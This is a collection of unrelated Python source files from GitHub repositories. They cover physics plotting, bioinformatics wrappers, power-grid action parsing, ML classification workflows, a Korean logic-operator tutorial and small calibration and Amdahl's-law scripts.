open('DM_DICT.json')\nmodel_names = json.load(json_file2)\nsave_as = 'mZp_'+model_names[model_dsids[0][0]].split(' ')[-2]+'/'\n\nplot_dir = '../../Plots/XGBoost/Model_independent_frfr/'+met_reg+'/'+dm_model+'/'\n\nplt.figure(figsize=(11,8))\nX_axis = [0.5, 0.6, 0.7, 0.8, 0.9, 0.99]\nY_axis_130 = Z_score_array(sig_mzp_130, bkg_mzp_130)\nY_axis_200 = Z_score_array(sig_mzp_200, bkg_mzp_200)\nY_axis_400 = Z_score_array(sig_mzp_400, bkg_mzp_400)\nY_axis_600 = Z_score_array(sig_mzp_600, bkg_mzp_600)\n\nplt.figure(figsize=[10,6])\nplt.plot(X_axis, Y_axis_130, linestyle='--')\nplt.scatter(X_axis, Y_axis_130, label = \"$m_{Z'}$ 130 GeV\")\nplt.plot(X_axis, Y_axis_200, linestyle='--')\nplt.scatter(X_axis, Y_axis_200, label = \"$m_{Z'}$ 200 GeV\")\nplt.plot(X_axis, Y_axis_400, linestyle='--')\nplt.scatter(X_axis, Y_axis_400, label = \"$m_{Z'}$ 400 GeV\")\nplt.plot(X_axis, Y_axis_600, linestyle='--')\nplt.scatter(X_axis, Y_axis_600, label = \"$m_{Z'}$ 600 GeV\")\nplt.xlim([0,1])\nplt.ylim([np.nanmin(Y_axis_600)*0.9, np.nanmax(Y_axis_130)*1.1])\nplt.yscale('log')\nplt.grid(True)\nplt.legend()\nplt.ylabel('Expected significance [$\\sigma$]')\nif met_reg =='50-100':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR1\")\nelif met_reg =='100-150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR2\")\nelif met_reg =='150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR3\")\nplt.xlabel('XGBoost output')\nplt.savefig(plot_dir+'EXP_SIG_'+channel+'.pdf')\n\n","repo_name":"rubenguevara/Master-Thesis","sub_path":"ML/XGBoost/FULL_model_independent_testing_plot_sig.py","file_name":"FULL_model_independent_testing_plot_sig.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"27637485119","text":"import os\nimport sys\n\n\ndef pairedEnd(R1, R2):\n print(sys.path)\n try:\n os.popen(\" \".join(\n ['trimmomatic PE -phred33 ',\n R1,\n R2,\n R1+'.paired',\n R1+'.unpaired',\n R2+'.paired',\n R2+'.unpaired',\n 'LEADING:3',\n 'TRAILING:3',\n 'SLIDINGWINDOW:4:15',\n 'MINLEN:36'\n ])).read()\n return True\n except:\n return False\n","repo_name":"gaarangoa/deeparg","sub_path":"deeparg/short_reads_pipeline/tools/trimmomaticClass.py","file_name":"trimmomaticClass.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17394387354","text":"import json\nimport os\nimport numpy as np\n\nfrom grid2op.Parameters import Parameters\nfrom oracle4grid.core.utils.config_ini_utils import MAX_ITER\n\nfrom oracle4grid.core.utils.constants import EnvConstants\nfrom oracle4grid.core.utils.prepare_environment import prepare_env\n#from oracle4grid.core.oracle import oracle\n\nASSET_MAPPING = {\"line (origin)\":\"lines_id_bus\",\n \"line (extremity)\":\"lines_id_bus\",\n \"generator\":\"gens_id_bus\",\n \"load\":\"loads_id_bus\"}\n\n#def load_and_run(env_dir, chronic, action_file, debug,agent_seed,env_seed, config, constants=EnvConstants()):\n# atomic_actions, env, debug_directory, chronic_id = load(env_dir, chronic, action_file, debug, constants=constants, config = config)\n# # Parse atomic_actions format\n# # atomic_actions = parse(atomic_actions,env)\n# parser = OracleParser(atomic_actions, env.action_space)\n# atomic_actions = parser.parse()\n#\n# # Run all steps\n# return oracle(atomic_actions, env, debug, config, debug_directory=debug_directory,agent_seed=agent_seed,env_seed=env_seed,\n# grid_path=env_dir, chronic_scenario=chronic, constants=constants)\n\n\ndef load(env_dir, chronic, action_file, debug, constants=EnvConstants(), config = None, opponent_allowed=True):\n param = Parameters()\n param.init_from_dict(constants.DICT_GAME_PARAMETERS_SIMULATION)\n env, chronic_id = prepare_env(env_dir, chronic, param, opponent_allowed=opponent_allowed)\n\n # Load unitary actions\n with open(action_file) as f:\n atomic_actions = json.load(f)\n\n # Init debug mode if necessary\n if debug:\n try:\n output_path = config[\"output_path\"]\n except:\n output_path = \"oracle4grid/output\" # os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../..\",'output')\n debug_directory = init_debug_directory(env_dir, action_file, chronic, output_path)\n else:\n debug_directory = None\n return atomic_actions, env, debug_directory, chronic_id\n\n\ndef init_debug_directory(env_dir, action_file, chronic, output_path = None):\n\n action_file_os = os.path.split(action_file)[len(os.path.split(action_file)) - 1].replace(\".json\", \"\")\n grid_file_os = os.path.split(env_dir)[len(os.path.split(env_dir)) - 1]\n scenario = \"scenario_\" + str(chronic)\n debug_directory = os.path.join(output_path, grid_file_os, scenario, action_file_os)\n os.makedirs(debug_directory, exist_ok=True)\n replay_debug_directory = os.path.join(debug_directory, \"replay_logs\")\n os.makedirs(replay_debug_directory, exist_ok=True)\n return debug_directory\n\nclass OracleParser():\n def __init__(self, d, action_space):\n self.d = d\n self.action_space = action_space\n self.parse = self.choose_parser_function()\n\n def choose_parser_function(self):\n if type(self.d) is list:\n if 'set_bus' in list(self.d[0].keys()):\n if 'substations_id' in list(self.d[0]['set_bus'].keys()):\n # Format 1 detected\n print(\"Specific format is detected for actions: converting with parser 1\")\n return self.parser1\n if type(self.d) is dict:\n if 'sub' in list(self.d.keys()) or 'line' in list(self.d.keys()):\n first_key = list(self.d.keys())[0]\n first_sub_or_line_id = list(self.d[first_key].keys())[0]\n if first_sub_or_line_id.isnumeric():\n if type(self.d[first_key][first_sub_or_line_id]) is list:\n first_action = self.d[first_key][first_sub_or_line_id][0]\n specific_key = list(first_action.keys())[0]\n if specific_key == \"set_configuration\":\n # Format 2 detected\n print(\"Specific format is detected for actions: converting with parser 2\")\n return self.parser2\n elif specific_key in list(ASSET_MAPPING.values()) or specific_key == \"set_line\":\n # Natural Oracle Format\n print(\"Natural Oracle format is detected for actions\")\n return self.parser0\n else:\n raise ValueError(\"json action dict is in an unknown format - action key \"+str(specific_key)+\" not handled\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n\n def parser0(self):\n return self.d\n\n def parser1(self):\n subs = set()\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n sub = sub_action[0]\n subs.add(sub)\n\n # init new dict with subs\n new_d = {'sub': {sub: [] for sub in subs}}\n\n # Pas bonne idée, parcourir dans la boucle\n grid = self.action_space.cls_to_dict()\n\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n subid = sub_action[0]\n sub_topo = sub_action[1]\n\n # On cherche les ids des gens, loads et lines_ex/or modifiées par l'action sub_topo (qui donne le nouveau bus)\n # Generators\n gen_ids = [id_ for id_, subid_ in enumerate(grid['gen_to_subid']) if\n subid_ == subid] # id des générateurs concernés par cette substation\n new_action_on_gens = {\"gens_id_bus\":\n [[id_, sub_topo[grid['gen_to_sub_pos'][id_]]] for id_ in gen_ids]\n # Couples id du générateur, nouveau bus donné par sub_topo\n }\n # Loads\n load_ids = [id_ for id_, subid_ in enumerate(grid['load_to_subid']) if\n subid_ == subid]\n new_action_on_loads = {\"loads_id_bus\":\n [[id_, sub_topo[grid['load_to_sub_pos'][id_]]] for id_ in load_ids]\n }\n # Lines origins and extremities gathered\n line_or_ids = [id_ for id_, subid_ in enumerate(grid['line_or_to_subid']) if\n subid_ == subid]\n line_ex_ids = [id_ for id_, subid_ in enumerate(grid['line_ex_to_subid']) if\n subid_ == subid]\n new_action_on_lines = {\"lines_id_bus\":\n [[id_, sub_topo[grid['line_or_to_sub_pos'][id_]]] for id_ in line_or_ids] + [\n [id_, sub_topo[grid['line_ex_to_sub_pos'][id_]]] for id_ in line_ex_ids]\n }\n new_action = {**new_action_on_loads, **new_action_on_gens, **new_action_on_lines}\n new_d['sub'][subid].append(new_action)\n # TODO: lines\n return new_d\n\n def parser2(self):\n new_dict = {line_or_sub:\n {id_: [] for id_ in self.d[line_or_sub]}\n for line_or_sub in self.d.keys()}\n for line_or_sub in self.d:\n for id_ in self.d[line_or_sub]:\n for original_action in self.d[line_or_sub][id_]:\n action = np.array(original_action['set_configuration'])\n asset_types, asset_ids, asset_actions = find_and_check_action_on_assets(action, self.action_space,\n line_or_sub, int(id_))\n unitary_action_dict = get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub)\n target_l = new_dict[line_or_sub][id_].copy()\n target_l.append(unitary_action_dict)\n new_dict[line_or_sub][id_] = target_l\n return new_dict\n\ndef find_and_check_action_on_assets(action, action_space, line_or_sub, id_):\n impact = action_space.from_vect(action).impact_on_objects()\n\n # Initialize list of results\n asset_types = []\n asset_ids = []\n asset_actions = []\n\n # In case the action is on sub, check it is the case and on the right sub\n # Then, extract infos on assets impacted\n if line_or_sub == 'sub':\n bus_impact = impact['topology']['assigned_bus']\n if len(bus_impact) == 0:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" doesnt impact substation bus\")\n else:\n for sub_action in bus_impact:\n if sub_action['substation'] != id_:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" impacts an other substation (sub number \"+str(sub_action['substation'])+\")\")\n else:\n asset_actions.append(int(sub_action['bus']))\n asset_ids.append(int(sub_action['object_id']))\n asset_types.append(ASSET_MAPPING[sub_action['object_type']])\n\n # In case it is line disconnection, just check it impacts the right line\n elif line_or_sub == \"line\":\n line_impact = impact['force_line']['disconnections']['powerlines']\n if len(line_impact) == 0:\n raise ValueError(\"Declared line action on line number\"+str(id_)+\" doesnt disconnect any line\")\n else:\n for line_id_disc in line_impact:\n if line_id_disc != id_:\n raise ValueError(\"Declared line disconnection on line number\"+str(id_)+\" impacts an other line (sub number \"+str(line_id_disc)+\")\")\n\n return asset_types, asset_ids, asset_actions\n\n\ndef get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub):\n if line_or_sub == \"sub\":\n d = dict()\n for asset_type, asset_id, asset_action in zip(asset_types, asset_ids, asset_actions):\n if asset_type in list(d.keys()):\n # update new sub action on this asset type\n action_on_asset = d[asset_type].copy()\n action_on_asset.append([asset_id, asset_action])\n d[asset_type] = action_on_asset\n else:\n # First action on this asset type\n d[asset_type] = [[asset_id, asset_action]]\n elif line_or_sub == \"line\":\n d = {\"set_line\":-1}\n return d\n","repo_name":"marota/Oracle4Grid","sub_path":"oracle4grid/core/utils/launch_utils.py","file_name":"launch_utils.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"40976302130","text":"\n'''\n* 논리 연산자 (&, |, and, or, not)\n\n# &, and: 좌항과 우항의 논리값이 모두 True일 경우에만 전체 결과 True 도출\n'''\na = 5\n\nif a > 1 and a < 10:\n print('asms 1~10 사이의 숫자가 아닙니다.')\nelse:\n print('a는 1~10 사이의 숫자가 아닙니다.')\n\n# 파이썬은 위의 식을 연결해서 작성 가능\nif 1 < a < 10:\n print('ok!')\n\n'''\n|, or: 좌항과 우항의 논리값이 한 쪽만 True여도 전체 결과 True 도출\n'''\n\n'''\n* 단축 평가 여산 (short circuit: and, or)\n- 좌항에서 전체 결과가 판명났을 경우 우항 연산을 진행하지 않는 연산자\n'''\n\nc = 0\n\nif(c == 0) or (10 / c == 5): # 우항에서 100% 에러가 나는 상황\n print('에러 없이 통과')\n\n# not 여산자는 논리값을 반전시킴\n\n'''\n- c언어에서는 정수 0을 False로 해석하고, \n0이 아닌 모든 정수를 True로 해석 (논리형 없음)\n파이썬에서도 C의 논리해석 그대로 적용 가능\n'''\n\napple = 5\nif not apple:\n print('사과가 하나도 없습니다.')\nelse:\n print('사과가', apple, '개 있습니다.')\n\n'''\n* 코딩도장 연습문제\n국어, 영어, 수학, 과학 점수가 있을 때 한 과목이라도 50점 미만이면 불합격,\n 다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요.\n'''\nkorean = 92\nenglish = 47\nmathematics = 86\nscience = 81\n\nif korean >= 50 and english >= 50 and mathematics >= 50 and science >= 50:\n print('합격')\nelse:\n print('불합격') \n\n'''\n* 코딩도장 퀴즈\n표준 입력으로 국어, 영어, 수학, 과학 점수가 입력됩니다. 국어는 90점 이상, \n영어는 80점 초과, 수학은 85점 초과, 과학은 80점 이상일 때 합격이라고 정했습니다\n(한 과목이라도 조건에 만족하지 않으면 불합격). \n다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요\n'''\nkor, eng, math, sc = map(int, input().split())\nprint( kor >= 90 and eng > 80 and math > 85 and sc >= 80)\n","repo_name":"suyeon0610/python","sub_path":"Basic/logical_operator.py","file_name":"logical_operator.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12042137392","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport pandas as pd\nfrom multipledispatch import dispatch\n\nfrom ..constants import MLFLOW_ARTIFACT_DATA_PATH\nfrom ..model.classification import (\n ClassificationWorkflowBase,\n DecisionTreeClassification,\n ExtraTreesClassification,\n GradientBoostingClassification,\n KNNClassification,\n LogisticRegressionClassification,\n MLPClassification,\n RandomForestClassification,\n SVMClassification,\n XgboostClassification,\n)\nfrom ._base import ModelSelectionBase\n\n\nclass ClassificationModelSelection(ModelSelectionBase):\n \"\"\"Simulate the normal way of training classification algorithms.\"\"\"\n\n def __init__(self, model_name: str) -> None:\n self.model_name = model_name\n self.clf_workflow = ClassificationWorkflowBase()\n self.transformer_config = {}\n\n @dispatch(object, object, object, object, object, object)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n ) -> None:\n \"\"\"Train by Scikit-learn framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n hyper_parameters = SVMClassification.manual_hyper_parameters()\n self.clf_workflow = SVMClassification(\n kernel=hyper_parameters[\"kernel\"],\n degree=hyper_parameters[\"degree\"],\n gamma=hyper_parameters[\"gamma\"],\n C=hyper_parameters[\"C\"],\n shrinking=hyper_parameters[\"shrinking\"],\n )\n elif self.model_name == \"Decision Tree\":\n hyper_parameters = DecisionTreeClassification.manual_hyper_parameters()\n self.clf_workflow = DecisionTreeClassification(\n criterion=hyper_parameters[\"criterion\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n )\n elif self.model_name == \"Random Forest\":\n hyper_parameters = RandomForestClassification.manual_hyper_parameters()\n self.clf_workflow = RandomForestClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Xgboost\":\n hyper_parameters = XgboostClassification.manual_hyper_parameters()\n self.clf_workflow = XgboostClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n subsample=hyper_parameters[\"subsample\"],\n colsample_bytree=hyper_parameters[\"colsample_bytree\"],\n alpha=hyper_parameters[\"alpha\"],\n lambd=hyper_parameters[\"lambd\"],\n )\n elif self.model_name == \"Logistic Regression\":\n hyper_parameters = LogisticRegressionClassification.manual_hyper_parameters()\n self.clf_workflow = LogisticRegressionClassification(\n penalty=hyper_parameters[\"penalty\"],\n C=hyper_parameters[\"C\"],\n solver=hyper_parameters[\"solver\"],\n max_iter=hyper_parameters[\"max_iter\"],\n class_weight=hyper_parameters[\"class_weight\"],\n l1_ratio=hyper_parameters[\"l1_ratio\"],\n )\n elif self.model_name == \"Multi-layer Perceptron\":\n hyper_parameters = MLPClassification.manual_hyper_parameters()\n self.clf_workflow = MLPClassification(\n hidden_layer_sizes=hyper_parameters[\"hidden_layer_sizes\"],\n activation=hyper_parameters[\"activation\"],\n solver=hyper_parameters[\"solver\"],\n alpha=hyper_parameters[\"alpha\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_iter=hyper_parameters[\"max_iter\"],\n )\n elif self.model_name == \"Extra-Trees\":\n hyper_parameters = ExtraTreesClassification.manual_hyper_parameters()\n self.clf_workflow = ExtraTreesClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Gradient Boosting\":\n hyper_parameters = GradientBoostingClassification.manual_hyper_parameters()\n self.clf_workflow = GradientBoostingClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n subsample=hyper_parameters[\"subsample\"],\n loss=hyper_parameters[\"loss\"],\n )\n elif self.model_name == \"K-Nearest Neighbors\":\n hyper_parameters = KNNClassification.manual_hyper_parameters()\n self.clf_workflow = KNNClassification(\n n_neighbors=hyper_parameters[\"n_neighbors\"],\n weights=hyper_parameters[\"weights\"],\n algorithm=hyper_parameters[\"algorithm\"],\n leaf_size=hyper_parameters[\"leaf_size\"],\n p=hyper_parameters[\"p\"],\n metric=hyper_parameters[\"metric\"],\n )\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train)\n y_test_predict = self.clf_workflow.predict(X_test)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n self.clf_workflow.save_hyper_parameters(hyper_parameters, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components()\n\n # Special components of different algorithms\n self.clf_workflow.special_components()\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save()\n\n @dispatch(object, object, object, object, object, object, bool)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n is_automl: bool,\n ) -> None:\n \"\"\"Train by FLAML framework + RAY framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n self.clf_workflow = SVMClassification()\n elif self.model_name == \"Decision Tree\":\n self.clf_workflow = DecisionTreeClassification()\n elif self.model_name == \"Random Forest\":\n self.clf_workflow = RandomForestClassification()\n elif self.model_name == \"Xgboost\":\n self.clf_workflow = XgboostClassification()\n elif self.model_name == \"Logistic Regression\":\n self.clf_workflow = LogisticRegressionClassification()\n elif self.model_name == \"Multi-layer Perceptron\":\n self.clf_workflow = MLPClassification()\n elif self.model_name == \"Extra-Trees\":\n self.clf_workflow = ExtraTreesClassification()\n elif self.model_name == \"Gradient Boosting\":\n self.clf_workflow = GradientBoostingClassification()\n elif self.model_name == \"K-Nearest Neighbors\":\n self.clf_workflow = KNNClassification()\n\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train, is_automl)\n y_test_predict = self.clf_workflow.predict(X_test, is_automl)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n if self.clf_workflow.ray_best_model is not None:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.ray_best_model.get_params(), self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n else:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.automl.best_config, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components(is_automl)\n\n # Special components of different algorithms\n self.clf_workflow.special_components(is_automl)\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save(is_automl)\n","repo_name":"ZJUEarthData/geochemistrypi","sub_path":"geochemistrypi/data_mining/process/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11345,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"} +{"seq_id":"44250696471","text":"from lab_framework import Manager, analysis\nfrom numpy import sin, cos, deg2rad, inf\nimport matplotlib.pyplot as plt\n\ndef fit_func(theta, phi, alpha, N, C):\n return N*(cos(deg2rad(alpha))**2 - 0.5*cos(2*deg2rad(alpha))*sin(2*deg2rad(theta-phi))**2) + C\n\nif __name__ == '__main__':\n \n TRIAL = 2\n SWEEP_PARAMS = [-15, -3, 30, 5, 3]\n UVHWP_ANGLE = 0\n\n '''\n # initialize the manager\n m = Manager(config='../config.json')\n\n # log session info\n m.log(f'AQWP.py TRIAL # {TRIAL}; SWEEP PARAMS = {SWEEP_PARAMS}; UVHWP ANGLE = {UVHWP_ANGLE}')\n\n # configure the UVHWP to produce _something_\n m.C_UV_HWP.goto(UVHWP_ANGLE)\n\n # sweep alice's quarter waveplate\n m.sweep('A_QWP', *SWEEP_PARAMS)\n\n # get the output\n df = m.output_data(f'AQWP_sweep{TRIAL}.csv')\n m.shutdown()\n '''\n\n df = Manager.load_data('AQWP_sweep1.csv')\n \n # fit the function\n params = analysis.fit(fit_func, df['A_QWP'], df['C4'], p0=[0, 90.1518, 2423, -46], bounds=[[-180, -180, -inf, -inf], [180, 180, inf, inf]], maxfev=1000)\n # params = analysis.fit('quadratic', df['A_QWP'], df['C4'])\n\n # print fitted parameters\n print(f'Fit parameters = {params}')\n\n # plotting\n # analysis.plot_func('quadratic', params, df['A_QWP'], color='b', linestyle='dashed', label=f'Fit Function', alpha=0.3)\n fig = plt.figure(figsize=(9,6))\n ax = fig.add_subplot(1,1,1)\n analysis.plot_func(fit_func, params, df['A_QWP'], color='b', linestyle='dashed', label=f'${params[2].n:.3f}[\\\\cos^2({params[1].n:.3f})+\\\\cos(2\\\\cdot{params[1].n:.3f})\\\\sin^2(2(\\\\theta{params[0].n:.3f}))/2]+{params[3].n:.3f}$', alpha=0.3)\n analysis.plot_errorbar(df['A_QWP'], df['C4'], ms=0.1, fmt='ro', capsize=2, label='Data')\n plt.xlabel('Alice\\'s QWP Angle (degrees)')\n plt.ylabel('Count Rate (#/s)')\n plt.legend()\n # plt.title(f'Fit=${params[1].n:.3f}(x-{params[0].n:.3f})^2 + {params[2].n:.3f}$')\n plt.title(f'Alice QWP Sweep')\n plt.savefig(f'AQWP_fit.png', dpi=600)\n plt.show()\n","repo_name":"Lynn-Quantum-Optics/Summer-2023","sub_path":"calibration/AQWP/AQWP_fit.py","file_name":"AQWP_fit.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38117359183","text":"from gekko import GEKKO\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy.integrate import odeint\r\nimport matplotlib.pyplot as plt\r\n\r\n### Code for this project was written by Brent M. Lund ###\r\n\r\nfor num in range(1, 10): #This is Amdahl's Law\r\n variable = 1 / num #variable represents the percentage change for the equation or fraction enhanced\r\n variable1 = (1 - variable) # 1 - by the fraction enhanced\r\n variable2 = (variable / num) #fraction enhanced / number of core processors\r\n variable3 = variable1 + variable2 #Variable1 was added to variable2\r\n variable4 = 1 / variable3 #divided one by the final product of variable 3\r\n print(\"Processor cores Added: \", num)\r\n print(\"Final Point of Amdel's Law: \", variable4)\r\n\r\nresult = [1, 1.3333, 1.28, 1.23, 1.19, 1.16, 1.13, 1.12]\r\nplt.plot(result)\r\nplt.show()\r\n\r\nprint(\"An Amdel Law derivative: \")\r\ndef Amdel_Law_derivative(derivative): #derivitave of Amdel's_Law\r\n k = .03\r\n derivative_V = derivative * (derivative + 1) #multiplied fraction enhanced with-\r\n derivative_X = (derivative - (derivative - 1 *(k))) #the number of core processors\r\n derivative_Y = (derivative_X) * (derivative_X) #the number of core processors-\r\n derivative_Z = derivative_V / derivative_Y\r\n #subtracted it by fraction enhanced\r\n #multiplied this result by itself\r\n print(derivative_Z)\r\n\r\nAmdel_Law_derivative(1)\r\nAmdel_Law_derivative(2)\r\nAmdel_Law_derivative(3)\r\nAmdel_Law_derivative(4)\r\nAmdel_Law_derivative(5)\r\nAmdel_Law_derivative(6)\r\nAmdel_Law_derivative(7)\r\nAmdel_Law_derivative(8)\r\n\r\n# function that returns dy/dt\r\ndef model(y, t): #applied my derivative of Amdel's_Law above-\r\n #and plugged it into the model function\r\n dev_v = y * (y + 1)\r\n dev_x = (y - (y - 1 * (.03)))\r\n dev_y = (dev_x) * (dev_x)\r\n dev_z = dev_v / dev_y\r\n dydt = dev_z\r\n return dydt\r\n\r\n# initial condition\r\ny0 = 1\r\n\r\n# time points\r\nt = np.linspace(0, 1000) # shows my eleven points between 0 and 10\r\n\r\ny = odeint(model, y0, t)\r\n\r\n# plot results\r\nplt.plot(t, y)\r\nplt.xlabel('time')\r\nplt.ylabel('y(t)')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Myron000/CST-305","sub_path":"Amdel's_Law.py","file_name":"Amdel's_Law.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2914359549","text":"import subprocess\nimport sys\nimport os\n\npackages = [\n \"statsmodels==0.11.1\",\n \"xgboost==0.90\",\n \"numpy==1.16.1\",\n \"glibc\",\n \"lxml\",\n \"sklearn-pandas\",\n \"lightgbm\",\n \"pandas\",\n \"numpy\",\n \"pytest-cov\",\n \"pytest\",\n \"codecov\",\n \"xmlschema\",\n \"scikit-learn==0.23.1\"\n]\n\ndef installPackage(package):\n subprocess.call([sys.executable, \"-m\", \"pip\", \"install\", package])\n\nif __name__ == \"__main__\":\n for pck in packages:\n installPackage(pck)","repo_name":"mohammedfazil003/nyoka","sub_path":"nyoka/tests/_install_dependencies.py","file_name":"_install_dependencies.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"595773134","text":"#!/usr/bin/env python3\n\nimport sys\n\nif len(sys.argv) > 1:\n f = open( sys.argv[1] )\nelse:\n f = sys.stdin\n#just open file of interest with standard argument, first part is unnecessary \nfor line in f:\n if \"DROME\" in line:\n #drome refers to correct species\n fields = line.rstrip(\"\\r\\n\").split()\n #whitespace deliniation\n if fields[-1].startswith(\"FBgn\"):\n #look at the last column, they have to start with the FBgn to be counted in the printed dataset\n print(fields[3] + \" \" + fields[2])\n #prints two columns, first has flybase ID and second has uniprot 